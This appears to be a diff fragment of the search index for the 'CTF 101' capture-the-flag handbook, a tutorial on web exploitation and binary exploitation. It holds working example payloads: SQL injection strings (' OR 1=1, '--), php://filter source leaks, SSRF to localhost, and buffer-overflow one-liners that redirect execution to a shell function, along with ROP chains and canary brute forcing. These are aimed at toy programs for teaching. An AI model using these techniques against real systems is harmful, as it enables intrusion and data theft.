FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE array() FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE \"php\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE=="}, {"location": "web-exploitation/php/what-is-php/#file-inclusion", "title": "File Inclusion", "text": "PHP has multiple ways to include other source files such as require, require_once and include. These can take a dynamic string such as require $_GET['page'] . \".php\";
which is usually seen in templating.
PHP has its own URL scheme: php://...
and its main purpose is to filter output automatically. It can automatically remove certain HTML tags and can base64 encode as well.
$fp = fopen('php://output', 'w');\nstream_filter_append(\n $fp,\n 'string.strip_tags',\n STREAM_FILTER_WRITE,\n array('b','i','u'));\nfwrite($fp, \"<b>bolded text</b> enlarged to a <h1>level 1 heading</h1>\\n\");\n/* <b>bolded text</b> enlarged to a level 1 heading */\n
"}, {"location": "web-exploitation/php/what-is-php/#exploitation", "title": "Exploitation", "text": "These filters can also be used on input such as:
php://filter/convert.base64-encode/resource={file}
include
, file_get_contents()
, etc. support URLs including PHP stream filter URLs (php://
)include
normally evaluates any PHP code (in tags) it finds, but if it\u2019s base64 encoded it can be used to leak sourceServer Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.
For example, say there is a website that lets you take a screenshot of any site on the internet.
Under normal usage a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost ? Or perhaps tries to access something more useful like http://localhost/server-status ?
Note
127.0.0.1 (also known as localhost or loopback) represents the computer itself. Accessing localhost means you are accessing the computer's own internal network. Developers often use localhost as a way to access the services they have running on their own computers.
Depending on what the response from the site is the attacker may be able to gain additional information about what's running on the computer itself.
In addition, the requests originating from the server would come from the server's IP not the attackers IP. Because of that, it is possible that the attacker might be able to access internal resources that he wouldn't normally be able to access.
Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/", "title": "SQL Injection", "text": "SQL Injection is a vulnerability where an application takes input from a user and doesn't vaildate that the user's input doesn't contain additional SQL.
<?php\n $username = $_GET['username']; // kchung\n $result = mysql_query(\"SELECT * FROM users WHERE username='$username'\");\n?>\n
If we look at the $username variable, under normal operation we might expect the username parameter to be a real username (e.g. kchung).
But a malicious user might submit different kind of data. For example, consider if the input was '
?
The application would crash because the resulting SQL query is incorrect.
SELECT * FROM users WHERE username='''\n
Note
Notice the extra single quote at the end.
With the knowledge that a single quote will cause an error in the application we can expand a little more on SQL Injection.
What if our input was ' OR 1=1
?
SELECT * FROM users WHERE username='' OR 1=1\n
1 is indeed equal to 1. This equates to true in SQL. If we reinterpret this the SQL statement is really saying
SELECT * FROM users WHERE username='' OR true\n
This will return every row in the table because each row that exists must be true.
We can also inject comments and termination characters like --
or /*
or ;
. This allows you to terminate SQL queries after your injected statements. For example '--
is a common SQL injection payload.
SELECT * FROM users WHERE username=''-- '\n
This payload sets the username parameter to an empty string to break out of the query and then adds a comment (--
) that effectively hides the second single quote.
Using this technique of adding SQL statements to an existing query we can force databases to return data that it was not meant to return.
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/#preventing-sql-injection", "title": "Preventing SQL Injection", "text": "The best way to prevent SQL Injection is to use prepared statements. Prepared statements are a way to execute SQL queries that separates the query logic from the data being passed into the query.
<?php\n $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username');\n $stmt->execute(['username' => $username]);\n?>\n
In this example, the :username
is a placeholder that is replaced with the value of the $username
variable. The database driver will automatically escape the value of $username
to prevent SQL Injection.
Another way to prevent SQL Injection is to use an ORM (Object Relational Mapping) library. ORM libraries abstract the database layer and allow you to interact with the database using objects instead of raw SQL queries.
<?php\n $user = User::where('username', $username)->first();\n?>\n
ORM libraries automatically escape user input to prevent SQL Injection.
"}]} \ No newline at end of file +{"config": {"lang": ["en"], "separator": "[\\s\\-]+", "pipeline": ["stopWordFilter"]}, "docs": [{"location": "", "title": "Capture The Flag 101", "text": ""}, {"location": "#overview", "title": "Overview", "text": "Capture the Flags, or CTFs, are computer security competitions.
Teams of competitors (or just individuals) are pitted against each other in various challenges across multiple security disciplines, competing to earn the most points.
CTFs are often the beginning of one's cyber security career due to their team building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.
Info
For information about ongoing CTFs, check out CTFTime.
In this handbook you'll learn the basics\u2122 behind the methodologies and techniques needed to succeed in Capture the Flag competitions.
"}, {"location": "binary-exploitation/address-space-layout-randomization/", "title": "Address Space Layout Randomization (ASLR)", "text": "Address Space Layout Randomization (or ASLR) is the randomization of the place in memory where the program, shared libraries, the stack, and the heap are. This makes can make it harder for an attacker to exploit a service, as knowledge about where the stack, heap, or libc can't be re-used between program launches. This is a partially effective way of preventing an attacker from jumping to, for example, libc without a leak.
Typically, only the stack, heap, and shared libraries are ASLR enabled. It is still somewhat rare for the main program to have ASLR enabled, though it is being seen more frequently and is slowly becoming the default.
"}, {"location": "binary-exploitation/buffer-overflow/", "title": "Buffer Overflow", "text": "A Buffer Overflow is a vulnerability in which data can be written which exceeds the allocated space, allowing an attacker to overwrite other data.
"}, {"location": "binary-exploitation/buffer-overflow/#stack-buffer-overflow", "title": "Stack buffer overflow", "text": "The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.
#include <stdio.h>\n\nint main() {\n int secret = 0xdeadbeef;\n char name[100] = {0};\n read(0, name, 0x100);\n if (secret == 0x1337) {\n puts(\"Wow! Here's a secret.\");\n } else {\n puts(\"I guess you're not cool enough to see my secret\");\n }\n}\n
There's a tiny mistake in this program which will allow us to see the secret. name
is decimal 100 bytes, however we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.
If the compiler chose to layout the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x0\nESP -> 0xffff0000: 0x0 // name\n
let's look at what happens when we read in 0x100 bytes of 'A's.
The first decimal 100 bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
However when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbe41 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The least significant byte of secret
has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of secret
is \"clobbered\" with our 'A's
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0x41414141 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The remaining 152 bytes would continue clobbering values up the stack.
"}, {"location": "binary-exploitation/buffer-overflow/#passing-an-impossible-check", "title": "Passing an impossible check", "text": "How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite secret
happen to be the bytes that represent 0x1337 in little-endian, we'll see the secret message.
A small Python one-liner will work nicely: python -c \"print 'A'*100 + '\\x31\\x13\\x00\\x00'\"
This will fill the name
buffer with 100 'A's, then overwrite secret
with the 32-bit little-endian encoding of 0x1337.
As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as \"Saved EIP\" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main
finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called \"popping a shell\") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say there happens to be a nice function that does this defined somewhere else in the program that we normally can't get to:
void give_shell() {\n system(\"/bin/sh\");\n}\n
Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell
is. Then, when main returns, it will pop that address off of the stack and jump to it, running give_shell
, and giving us our shell.
Assuming give_shell
is at 0x08048fd0, we could use something like this: python -c \"print 'A'*108 + '\\xd0\\x8f\\x04\\x08'\"
We send 108 'A's to overwrite the 100 bytes that is allocated for name
, the 4 bytes for secret
, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell
's address, and we would get a shell!
This idea is extended on in Return Oriented Programming
"}, {"location": "binary-exploitation/heap-exploitation/", "title": "Heap Exploits", "text": ""}, {"location": "binary-exploitation/heap-exploitation/#overflow", "title": "Overflow", "text": "Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide new attack surface.
"}, {"location": "binary-exploitation/heap-exploitation/#use-after-free-uaf", "title": "Use After Free (UAF)", "text": "Once free
is called on an allocation, the allocator is free to re-allocate that chunk of memory in future calls to malloc
if it so chooses. However if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called a use after free or UAF.
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n\ntypedef struct string {\n unsigned length;\n char *data;\n} string;\n\nint main() {\n struct string* s = malloc(sizeof(string));\n puts(\"Length:\");\n scanf(\"%u\", &s->length);\n s->data = malloc(s->length + 1);\n memset(s->data, 0, s->length + 1);\n puts(\"Data:\");\n read(0, s->data, s->length);\n\n free(s->data);\n free(s);\n\n char *s2 = malloc(16);\n memset(s2, 0, 16);\n puts(\"More data:\");\n read(0, s2, 15);\n\n // Now using s again, a UAF\n\n puts(s->data);\n\n return 0;\n}\n
In this example, we have a string
structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string
. Due to how glibc's allocator works, s2
will actually get the same memory as the original s
allocation, which in turn gives us the ability to control the s->data
pointer. This could be used to leak program data.
Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc
, free
, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:
The No eXecute or the NX bit (also known as Data Execution Prevention or DEP) marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable.
"}, {"location": "binary-exploitation/overview/", "title": "Overview", "text": ""}, {"location": "binary-exploitation/overview/#binary-exploitation", "title": "Binary Exploitation", "text": "Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program's functions.
Common topics addressed by Binary Exploitation or 'pwn' challenges include:
Relocation Read-Only (or RELRO) is a security measure which makes some binary sections read-only.
There are two RELRO \"modes\": partial and full.
"}, {"location": "binary-exploitation/relocation-read-only/#partial-relro", "title": "Partial RELRO", "text": "Partial RELRO is the default setting in GCC, and nearly all binaries you will see have at least partial RELRO.
From an attackers point-of-view, partial RELRO makes almost no difference, other than it forces the GOT to come before the BSS in memory, eliminating the risk of a buffer overflows on a global variable overwriting GOT entries.
"}, {"location": "binary-exploitation/relocation-read-only/#full-relro", "title": "Full RELRO", "text": "Full RELRO makes the entire GOT read-only which removes the ability to perform a \"GOT overwrite\" attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run.
Full RELRO is not a default compiler setting as it can greatly increase program startup time since all symbols must be resolved before the program is started. In large programs with thousands of symbols that need to be linked, this could cause a noticable delay in startup time.
"}, {"location": "binary-exploitation/return-oriented-programming/", "title": "Return Oriented Programming", "text": "Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell
function however, so we need to find a way to manually invoke system
or another exec
function to get us our shell.
Imagine we have a program similar to the following:
#include <stdio.h>\n#include <stdlib.h>\n\nchar name[32];\n\nint main() {\n printf(\"What's your name? \");\n read(0, name, 32);\n\n printf(\"Hi %s\\n\", name);\n\n printf(\"The time is currently \");\n system(\"/bin/date\");\n\n char echo[100];\n printf(\"What do you want me to echo back? \");\n read(0, echo, 1000);\n puts(echo);\n\n return 0;\n}\n
We obviously have a stack buffer overflow on the echo
variable which can give us EIP control when main
returns. But we don't have a give_shell
function! So what can we do?
We can call system
with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.
When main returns, we want our stack to look like something had normally called system
. Recall what is on the stack after a function has been called:
... // More arguments\n 0xffff0008: 0x00000002 // Argument 2\n 0xffff0004: 0x00000001 // Argument 1\nESP -> 0xffff0000: 0x080484d0 // Return address\n
So main
's stack frame needs to look like this:
0xffff0008: 0xdeadbeef // system argument 1\n 0xffff0004: 0xdeadbeef // return address for system\nESP -> 0xffff0000: 0x08048450 // return address for main (system's PLT entry)\n
Then when main
returns, it will jump into system
's PLT entry and the stack will appear just like system
had been called normally for the first time.
Note: we don't care about the return address system
will return to because we will have already gotten our shell by then!
This is a good start, but we need to pass an argument to system
for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries \"move around\" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case however, we have a very convenient name
global which will be at a known location in the binary (in the BSS segment).
Our exploit will need to do the following:
name
system
's PLT entryname
global to act as the first argument to system
In 64-bit binaries we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running system
, this means we will need to find a way to control the RDI register.
To do this, we'll use small snippets of assembly in the binary, called \"gadgets.\" These gadgets usually pop
one or more registers off of the stack, and then call ret
, which allows us to chain them together by making a large fake call stack.
For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):
0x400c01: pop rdi; ret\n0x400c03: pop rsi; pop r15; ret\n
We can setup a fake call stack with these gadets to sequentially execute them, pop
ing values we control into registers, and then end with a jump to system
.
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n 0xffff0008: 0xdeadbeef // value to be popped into rdi\nRSP -> 0xffff0000: 0x400c01 // address of rdi gadget\n
Stepping through this one instruction at a time, main
returns, jumping to our pop rdi
gadget:
RIP = 0x400c01 (pop rdi)\nRDI = UNKNOWN\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\nRSP -> 0xffff0008: 0xdeadbeef // value to be popped into rdi\n
pop rdi
is then executed, popping the top of the stack into RDI:
RIP = 0x400c02 (ret)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\nRSP -> 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n
The RDI gadget then ret
s into our RSI gadget:
RIP = 0x400c03 (pop rsi)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\nRSP -> 0xffff0018: 0x1337beef // value we want in rsi\n
RSI and R15 are popped:
RIP = 0x400c05 (ret)\nRDI = 0xdeadbeef\nRSI = 0x1337beef\n\nRSP -> 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n
And finally, the RSI gadget ret
s, jumping to whatever function we want, but now with RDI and RSI set to values we control.
Stack Canaries are a secret value placed on the stack which changes every time the program is started. Prior to a function return, the stack canary is checked and if it appears to be modified, the program exits immeadiately.
"}, {"location": "binary-exploitation/stack-canaries/#bypassing-stack-canaries", "title": "Bypassing Stack Canaries", "text": "Stack Canaries seem like a clear cut way to mitigate any stack smashing as it is fairly impossible to just guess a random 64-bit value. However, leaking the address and bruteforcing the canary are two methods which would allow us to get through the canary check.
"}, {"location": "binary-exploitation/stack-canaries/#stack-canary-leaking", "title": "Stack Canary Leaking", "text": "If we can read the data in the stack canary, we can send it back to the program later because the canary stays the same throughout execution. However Linux makes this slightly tricky by making the first byte of the stack canary a NULL, meaning that string functions will stop when they hit it. A method around this would be to partially overwrite and then put the NULL back or find a way to leak bytes at an arbitrary stack offset.
A few situations where you might be able to leak a canary:
The canary is determined when the program starts up for the first time which means that if the program forks, it keeps the same stack cookie in the child process. This means that if the input that can overwrite the canary is sent to the child, we can use whether it crashes as an oracle and brute-force 1 byte at a time!
This method can be used on fork-and-accept servers where connections are spun off to child processes, but only under certain conditions such as when the input accepted by the program does not append a NULL byte (read or recv).
Buffer (N Bytes) ?? ?? ?? ?? ?? ?? ?? ?? RBP RIPFill the buffer N Bytes + 0x00 results in no crash
Buffer (N Bytes) 00 ?? ?? ?? ?? ?? ?? ?? RBP RIPFill the buffer N Bytes + 0x00 + 0x00 results in a crash
N Bytes + 0x00 + 0x01 results in a crash
N Bytes + 0x00 + 0x02 results in a crash
...
N Bytes + 0x00 + 0x51 results in no crash
Buffer (N Bytes) 00 51 ?? ?? ?? ?? ?? ?? RBP RIPRepeat this bruteforcing process for 6 more bytes...
Buffer (N Bytes) 00 51 FE 0A 31 D2 7B 3C RBP RIPNow that we have the stack cookie, we can overwrite the RIP register and take control of the program!
"}, {"location": "binary-exploitation/what-are-buffers/", "title": "Buffers", "text": "A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name
would be considered a stack buffer:
#include <stdio.h>\n\nint main() {\n char name[64] = {0};\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Buffers could also be global variables:
#include <stdio.h>\n\nchar name[64] = {0};\n\nint main() {\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Or dynamically allocated on the heap:
#include <stdio.h>\n#include <stdlib.h>\n\nint main() {\n char *name = malloc(64);\n memset(name, 0, 64);\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
"}, {"location": "binary-exploitation/what-are-buffers/#exploits", "title": "Exploits", "text": "Given that buffers commonly hold user input, mistakes when writing to them could result in attacker controlled data being written outside of the buffer's space. See the page on buffer overflows for more.
"}, {"location": "binary-exploitation/what-are-calling-conventions/", "title": "Calling Conventions", "text": "To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked in to programs that need it, reducing program size.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit
"}, {"location": "binary-exploitation/what-are-calling-conventions/#cdecl", "title": "cdecl", "text": "In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {\n return a + b + c;\n}\n
would be invoked by pushing c
, then b
, then a
.
For 64-bit binaries, function arguments are first passed in certain registers:
then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
"}, {"location": "binary-exploitation/what-are-calling-conventions/#other-conventions", "title": "Other Conventions", "text": "Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.
"}, {"location": "binary-exploitation/what-are-registers/", "title": "Registers", "text": "A register is a location within the processor that is able to store data, much like RAM. Unlike RAM however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not \"general purpose registers\" (GPRs). On x86, the only 2 reserved registers are rip
and rsp
which hold the address of the next instruction to execute and the address of the stack respectively.
On x86, the same register can have different sized accesses for backwards compatability. For example, the rax
register is the full 64-bit register, eax
is the low 32 bits of rax
, ax
is the low 16 bits, al
is the low 8 bits, and ah
is the high 8 bits of ax
(bits 8-16 of rax
).
A format string vulnerability is a bug where user input is passed as the format argument to printf
, scanf
, or another function in that family.
The format argument has many different specifiers which could allow an attacker to leak data if they control the format argument to printf
. Since printf
and similar are variadic functions, they will continue popping data off of the stack according to the format.
For example, if we can make the format argument \"%x.%x.%x.%x\", printf
will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.
printf
can also index to an arbitrary \"argument\" with the following syntax: \"%n$x\" (where n
is the decimal index of the argument you want).
While these bugs are powerful, they're very rare nowadays, as all modern compilers warn when printf
is called with a non-constant string.
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int secret_num = 0x8badf00d;\n\n char name[64] = {0};\n read(0, name, 64);\n printf(\"Hello \");\n printf(name);\n printf(\"! You'll never get my secret!\\n\");\n return 0;\n}\n
Due to how GCC decided to lay out the stack, secret_num
is actually at a lower address on the stack than name
, so we only have to go to the 7th \"argument\" in printf
to leak the secret:
$ ./fmt_string\n%7$llx\nHello 8badf00d3ea43eef\n! You'll never get my secret!\n
"}, {"location": "binary-exploitation/what-is-binary-security/", "title": "Binary Security", "text": "Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. This tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.
Some methods covered include:
The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are \"linked\" into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of function to address in dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts
won't be resolved to an address in libc until after it has been called once:
int main() {\n puts(\"Hi there!\");\n puts(\"Ok bye now.\");\n return 0;\n}\n
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls \"short circuit\" straight to their implementation bypassing the dynamic resolver.
This has two important implications:
These two facts will become very useful to use in Return Oriented Programming
"}, {"location": "binary-exploitation/what-is-the-got/#plt", "title": "PLT", "text": "Before a functions address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small \"stub\" function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
"}, {"location": "binary-exploitation/what-is-the-heap/", "title": "The Heap", "text": "The heap is a place in memory which a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:
There are also some disadvantages however:
In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:
malloc
: allocate n
bytes on the heapfree
: free the given allocationLet's see how these could be used in a program:
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nint main() {\n unsigned alloc_size = 0;\n char *stuff;\n\n printf(\"Number of bytes? \");\n scanf(\"%u\", &alloc_size);\n\n stuff = malloc(alloc_size + 1);\n memset(stuff, 0, alloc_size + 1);\n\n read(0, stuff, alloc_size);\n\n printf(\"You wrote: %s\", stuff);\n\n free(stuff);\n\n return 0;\n}\n
This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.
"}, {"location": "binary-exploitation/what-is-the-stack/", "title": "The Stack", "text": "In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp
/rsp
register holds the address in memory where the bottom of the stack resides. When something is push
ed to the stack, esp
decrements by 4 (or 8 on 64-bit x86), and the value that was push
ed is stored at that location in memory. Likewise, when a pop
instruction is executed, the value at esp
is retrieved (i.e. esp
is dereferenced), and esp
is then incremented by 4 (or 8).
N.B. The stack \"grows\" down to lower memory addresses!
Conventionally, ebp
/rbp
contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp
rather than an offset to esp
. A stack frame is essentially just the space used on the stack by a given function.
The stack is primarily used for a few things:
Let's see what the stack looks like right after say_hi
has been called in this 32-bit x86 C program:
#include <stdio.h>\n\nvoid say_hi(const char * name) {\n printf(\"Hello %s!\\n\", name);\n}\n\nint main(int argc, char ** argv) {\n char * name;\n if (argc != 2) {\n return 1;\n }\n name = argv[1];\n say_hi(name);\n return 0;\n}\n
And the relevant assembly:
0804840b <say_hi>:\n 804840b: 55 push ebp\n 804840c: 89 e5 mov ebp,esp\n 804840e: 83 ec 08 sub esp,0x8\n 8048411: 83 ec 08 sub esp,0x8\n 8048414: ff 75 08 push DWORD PTR [ebp+0x8]\n 8048417: 68 f0 84 04 08 push 0x80484f0\n 804841c: e8 bf fe ff ff call 80482e0 <printf@plt>\n 8048421: 83 c4 10 add esp,0x10\n 8048424: 90 nop\n 8048425: c9 leave\n 8048426: c3 ret\n\n08048427 <main>:\n 8048427: 8d 4c 24 04 lea ecx,[esp+0x4]\n 804842b: 83 e4 f0 and esp,0xfffffff0\n 804842e: ff 71 fc push DWORD PTR [ecx-0x4]\n 8048431: 55 push ebp\n 8048432: 89 e5 mov ebp,esp\n 8048434: 51 push ecx\n 8048435: 83 ec 14 sub esp,0x14\n 8048438: 89 c8 mov eax,ecx\n 804843a: 83 38 02 cmp DWORD PTR [eax],0x2\n 804843d: 74 07 je 8048446 <main+0x1f>\n 804843f: b8 01 00 00 00 mov eax,0x1\n 8048444: eb 1c jmp 8048462 <main+0x3b>\n 8048446: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 8048449: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 804844c: 89 45 f4 mov DWORD PTR [ebp-0xc],eax\n 804844f: 83 ec 0c sub esp,0xc\n 8048452: ff 75 f4 push DWORD PTR [ebp-0xc]\n 8048455: e8 b1 ff ff ff call 804840b <say_hi>\n 804845a: 83 c4 10 add esp,0x10\n 804845d: b8 00 00 00 00 mov eax,0x0\n 8048462: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]\n 8048465: c9 leave\n 8048466: 8d 61 fc lea esp,[ecx-0x4]\n 8048469: c3 ret\n
Skipping over the bulk of main
, you'll see that at 0x8048452
main
's name
local is pushed to the stack because it's the first argument to say_hi
. Then, a call
instruction is executed. call
instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi
at 0x0804840b
, the stack looks like this:
EIP = 0x0804840b (push ebp)\nESP = 0xffff0000\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
The first thing say_hi
does is save the current ebp
so that when it returns, ebp
is back where main
expects it to be. The stack now looks like this:
EIP = 0x0804840c (mov ebp, esp)\nESP = 0xfffefffc\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Again, note how esp
gets smaller when values are pushed to the stack.
Next, the current esp
is saved into ebp
, marking the top of the new stack frame.
EIP = 0x0804840e (sub esp, 0x8)\nESP = 0xfffefffc\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP, EBP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Then, the stack is \"grown\" to accommodate local variables inside say_hi
.
EIP = 0x08048414 (push [ebp + 0x8])\nESP = 0xfffeffec\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\nESP -> 0xfffefffc: UNDEFINED\n
NOTE: stack space is not implictly cleared!
Now, the 2 arguments to printf
are pushed in reverse order.
EIP = 0x0804841c (call printf@plt)\nESP = 0xfffeffe4\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\nESP -> 0xfffeffe4: 0x080484f0 // printf argument 1\n
Finally, printf
is called, which pushes the address of the next instruction to execute.
EIP = 0x080482e0\nESP = 0xfffeffe4\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\n 0xfffeffe4: 0x080484f0 // printf argument 1\nESP -> 0xfffeffe0: 0x08048421 // Return address for printf\n
Once printf
has returned, the leave
